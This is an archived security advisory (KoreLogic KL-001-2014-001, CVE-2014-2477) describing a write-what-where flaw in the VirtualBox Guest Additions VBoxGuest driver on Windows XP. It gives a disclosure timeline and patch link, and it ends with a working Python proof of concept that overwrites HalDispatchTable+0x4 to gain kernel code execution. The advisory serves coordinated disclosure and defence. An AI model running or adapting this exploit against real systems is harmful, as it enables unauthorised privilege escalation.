exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Oracle VirtualBox Guest Additions Arbitrary Write Privilege Escalation

Oracle VirtualBox Guest Additions Arbitrary Write Privilege Escalation
Posted Jul 15, 2014
Authored by Matthew Bergin

A vulnerability within VBoxGuest module allows an attacker to inject memory they control into an arbitrary location they define. This can be used by an attacker to overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling NtQueryIntervalProfile. Oracle VirtualBox Guest Additions versions 4.3.8 through 4.3.10 are affected.

tags | exploit, arbitrary
advisories | CVE-2014-2477
SHA-256 | 23d2e313c1427a208d2779f1e9be216e6d3f6f4025a67191718be30d6c492262

Oracle VirtualBox Guest Additions Arbitrary Write Privilege Escalation

Change Mirror Download
Title: Oracle VirtualBox Guest Additions Arbitrary Write Privilege Escalation
Advisory ID: KL-001-2014-001
Publication Date: 07.15.2014
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-001.txt


1. Vulnerability Details

Affected Vendor: Oracle
Affected Product: VirtualBox Guest Additions
Affected Versions: 4.3.8 - 4.3.10
Platform: Microsoft XP SP3
CWE Classification: CWE-123: Write-what-where Condition
Impact: Arbitrary code execution
Attack vector: IOCTL
CVE ID: CVE-2014-2477

2. Vulnerability Description

A vulnerability within VBoxGuest module allows an attacker to
inject memory they control into an arbitrary location they
define. This can be used by an attacker to overwrite
HalDispatchTable+0x4 and execute arbitrary code by subsequently
calling NtQueryIntervalProfile.

3. Technical Description

A userland process can create a handle into the VBoxGuest device
and subsequently make DeviceIoControlFile() calls into that
device. During the IRP handler routine for 0x0022a040 the user
provided OutputBuffer address is not validated. This allows an
attacker to specify an arbitrary address and write (or overwrite)
the memory residing at the specified address. This is classicaly
known as a write-what-where vulnerability and has well known
exploitation methods associated with it.

A stack trace from our fuzzing can be seen below. In our fuzzing
testcase, the specified OutputBuffer in the DeviceIoControlFile()
call is 0xffff0000.

STACK_TEXT:
f824a9d4 805241e0 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b
f824aa20 804e172b 00000001 ffff0000 00000000 nt!MmAccessFault+0x6f5
f824aa20 804eca3b 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc
f824aaf0 804ecaba ffa74248 f824ab3c f824ab30 nt!IopCompleteRequest+0x92
f824ab40 806f5c0e 00000000 00000000 f824ab58 nt!KiDeliverApc+0xb3
f824ab40 806f00b3 00000000 00000000 f824ab58 hal!HalpApcInterrupt2ndEntry+0x31
f824abcc 804e546c ffa74248 ffa74208 00000000 hal!KfLowerIrql+0x43
f824abec 804ecad4 ffa74248 811772d8 00000000 nt!KeInsertQueueApc+0x4b
f824ac20 faa36123 811772d8 81297558 00000000 nt!IopfCompleteRequest+0x1d8
f824ac34 804e3807 0000008c 0000008c 806f0070 VBoxGuest+0x1123
f824ac44 80568191 ffa7429c 811772d8 ffa74208 nt!IopfCallDriver+0x31
f824ac58 805770ca 812971a8 ffa74208 811772d8 nt!IopSynchronousServiceTail+0x70
f824ad00 805795e3 00000058 00000000 00000000 nt!IopXxxControlFile+0x611
f824ad34 804de7ec 00000058 00000000 00000000 nt!NtDeviceIoControlFile+0x2a
f824ad34 7c90e526 00000058 00000000 00000000 nt!KiFastCallEntry+0xf8
0021fa54 7c90d28a 1d1adc9a 00000058 00000000 ntdll!KiIntSystemCall+0x6
0021fa58 1d1adc9a 00000058 00000000 00000000 ntdll!ZwDeviceIoControlFile+0xc

Reviewing the TRAP_FRAME at the time of crash we can see
IopCompleteRequest() copying data from InputBuffer into the
OutputBuffer. InputBuffer is another parameter provided to the
DeviceIoControlFile() function and is therefore controllable by
the attacker. The edi register contains the invalid address
provided during the fuzz testcase.

ErrCode = 00000002
eax=0000008c ebx=ffa74208 ecx=00000023 edx=00000000 esi=811eabf0 edi=ffff0000
eip=804eca3b esp=f824aaac ebp=f824aaf0 iopl=0 nv up ei pl nz na po nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010202
nt!IopCompleteRequest+0x92:
0008:804eca3b f3a5 rep movs dword ptr es:[edi],dword ptr [esi]

A write-what-where vulnerability can be leveraged to obtained
escalated privileges. To do so, an attacker will need to allocate
memory in userland that is populated with shellcode designed to
find the Token for PID 4 (System) and then overwrite the token
for its own process. By leveraging the vulnerability it is then
possible to overwrite the pointer at HalDispatchTable+0x4 with a
pointer to our shellcode. Calling NtQueryIntervalProfile() will
subsequently call HalDispatchTable+0x4, execute our shellcode,
and elevate the privilege of the exploit process.

4. Mitigation and Remediation Recommendation

The vendor has patched this vulnerability. The patch information
is here:
http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html

5. Credit

This vulnerability was discovered by Matt Bergin of KoreLogic
Security, Inc.

6. Disclosure Timeline

04.28.14 - KoreLogic contacts Oracle with vulnerability report and PoC.
04.29.14 - Oracle acknowledges receipt of vulnerability report and PoC.
05.02.14 - Oracle assigns tracking to this vulnerability report
and states that it will be patched in the CPU cycle,
with credit for the report given to KoreLogic. Oracle
also states monthly updates will be provided.
05.22.14 - Oracle provides KoreLogic with status update
indicating the vulnerability will be patched in an
upcoming CPU and states that they will publicly
acknowledge KoreLogic in the associated public
bulletin.
06.11.14 - KoreLogic informs Oracle that 30 days have passed
since vendor acknowledgement of the initial report.
KoreLogic requests CVE number for the vulnerability,
if there is one. KoreLogic also requests vendor's
public identifier for the vulnerability along with the
expected disclosure date.
06.11.14 - Oracle responds with CVE number, expected release date
of 07.15.14 and public identifier (CVE number).
06.24.14 - Oracle provides status update.
07.02.14 - 45 business days have elapsed since vendor
acknowledged vulnerability.
07.11.14 - Oracle provides expected CPU release time.
07.15.14 - Coordinated public release of vulnerability and vendor
patch.

7. Proof of Concept

# KL-001-2014-001 : Oracle VirtualBox Guest Additions Arbitrary Write Privilege Escalation
# Oracle VirtualBox 4.3.8-4.3.10
#
# Matt Bergin (KoreLogic/Smash the Stack)
# thanks to bla
#

from ctypes import *
from struct import pack
from os import getpid,system
from sys import exit
EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA
GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle
VirtualProtect = windll.kernel32.VirtualProtect
INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0

# thanks to offsec for the concept
# I re-wrote the code as to not fully insult them :)
def getBase(name=None):
retArray = c_ulong*1024
ImageBase = retArray()
callback = c_int(1024)
cbNeeded = c_long()
EnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded))
for base in ImageBase:
driverName = c_char_p("\x00"*1024)
GetDeviceDriverBaseNameA(base,driverName,48)
if (name):
if (driverName.value.lower() == name):
return base
else:
return (base,driverName.value)
return None

handle = CreateFileA("\\\\.\\VBoxGuest",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)
print "[+] Handle \\\\.\\VBoxGuest @ %s" % (handle)
NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)
buf = "\xcc\xcc\xcc\xcc"*35
WriteProcessMemory(-1, 0x1, "\x90"*0x6000, 0x6000, byref(c_int(0)))
WriteProcessMemory(-1, 0x1, buf, 140, byref(c_int(0)))
#Overwrite Pointer
kBase,kVer = getBase()
hKernel = LoadLibraryExA(kVer,0,1)
HalDispatchTable = GetProcAddress(hKernel,"HalDispatchTable")
HalDispatchTable -= hKernel
HalDispatchTable += kBase
HalDispatchTable += 0x4
print "[+] Kernel @ %s, HalDispatchTable @ %s" % (hex(kBase),hex(HalDispatchTable))
DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x22a040,0x1,140,HalDispatchTable-40,0)
print "[+] HalDispatchTable+0x4 overwritten"
CloseHandle(handle)
NtQueryIntervalProfile(c_ulong(2),byref(c_ulong()))
#Something bad happened
exit(0)

The contents of this advisory are copyright(c) 2014 KoreLogic, Inc.
and are licensed under a Creative Commons Attribution Share-Alike 4.0
(United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven
track record of providing security services to entities ranging from
Fortune 500 to small and mid-sized companies. We are a highly skilled
team of senior security consultants doing by-hand security assessments
for the most important networks in the U.S. and around the world. We
are also developers of various tools and resources aimed at helping
the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt

Login or Register to add favorites

File Archive:

June 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    19 Files
  • 2
    Jun 2nd
    16 Files
  • 3
    Jun 3rd
    28 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    19 Files
  • 7
    Jun 7th
    23 Files
  • 8
    Jun 8th
    11 Files
  • 9
    Jun 9th
    10 Files
  • 10
    Jun 10th
    4 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    27 Files
  • 20
    Jun 20th
    65 Files
  • 21
    Jun 21st
    10 Files
  • 22
    Jun 22nd
    8 Files
  • 23
    Jun 23rd
    6 Files
  • 24
    Jun 24th
    6 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close